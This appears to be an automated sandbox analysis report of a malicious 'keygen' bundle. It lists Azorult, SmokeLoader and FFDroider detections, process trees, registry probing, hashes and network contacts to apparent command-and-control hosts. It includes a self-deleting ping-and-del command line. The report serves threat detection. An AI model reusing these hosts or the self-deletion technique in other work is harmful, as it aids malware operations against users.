| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
149s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2492 -ip 2492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 352
Network
Files
memory/2492-1-0x0000000002E10000-0x0000000002F10000-memory.dmp
memory/2492-2-0x0000000002CA0000-0x0000000002CA9000-memory.dmp
memory/2492-3-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2492-5-0x0000000002CA0000-0x0000000002CA9000-memory.dmp
memory/2492-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2492-4-0x0000000000400000-0x0000000002B4E000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"
Network
Files
memory/2544-0-0x00007FFBB8963000-0x00007FFBB8965000-memory.dmp
memory/2544-1-0x0000000000800000-0x000000000081E000-memory.dmp
memory/2544-2-0x00000000010E0000-0x00000000010FA000-memory.dmp
memory/2544-3-0x00007FFBB8960000-0x00007FFBB9421000-memory.dmp
memory/2544-5-0x00007FFBB8960000-0x00007FFBB9421000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240708-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Azorult
Azorult family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
keygen-step-1.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
keygen-step-6.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
keygen-step-3.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
Files
memory/2352-0-0x00000000000F0000-0x0000000000108000-memory.dmp
memory/3052-5-0x0000000000440000-0x0000000000525000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/2084-17-0x0000000000190000-0x0000000000275000-memory.dmp
memory/3048-37-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
138s
Command Line
Signatures
Azorult
Azorult family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
keygen-step-1.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
keygen-step-6.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
keygen-step-3.exe
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243720 0
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
Files
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240729-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2384 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243711 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
Files
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2180 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2180 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
| PID 2180 wrote to memory of 3652 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe" -a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"
Network
| Country | Destination | Domain | Proto |
| SG | 37.0.10.214:80 | | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| SG | 37.0.10.244:80 | | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2104 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 136
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ffdroider family
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
136s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4156 wrote to memory of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4156 wrote to memory of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4156 wrote to memory of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 212 wrote to memory of 4576 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 212 wrote to memory of 4576 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 212 wrote to memory of 4576 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.9.200.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files